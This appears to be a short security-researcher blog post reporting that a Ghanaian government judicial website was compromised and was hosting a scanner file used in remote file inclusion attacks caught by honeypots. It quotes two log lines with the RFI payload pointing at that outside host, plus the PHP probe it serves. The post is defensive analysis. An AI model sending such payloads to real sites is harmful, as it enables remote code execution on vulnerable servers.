Ghana Judicial Service site hacked

  • April 6, 2010

Yesterday we started to see RFI attacks against our honeypots using files hosted from http://www.judicial.gov.gh (Ghana’s official Judicial Service site).

These are some of the entries we are seeing:

a.18.218.14 – – [05/Apr/2010:11:22:26 -0700]
“GET //good.php?board.skin.path=http://www.judicial.gov.gh/r00t/idxx.pdf?? HTTP/1.1″ 404 206 “-” “Mozilla/5.0”

b.72.56.2 – – [05/Apr/2010:12:55:38 -0700]
“GET //good.php?board.skin.path=http://www.judicial.gov.gh/r00t/idxx.pdf?? HTTP/1.1″ 404 206 “-” “Mozilla/5.0”

Looking at the specified file, we see again the famous entry for the FeeLCoMz RFI Scanner Bot:

$ lynx –source –dump http://www.judicial.gov.gh/r00t/idxx.pdf

< ? php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>

And I bet money that they got hacked for using an old version of Joomla (or a vulnerable plugin).

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Related Tags
Related Categories
You May Also Like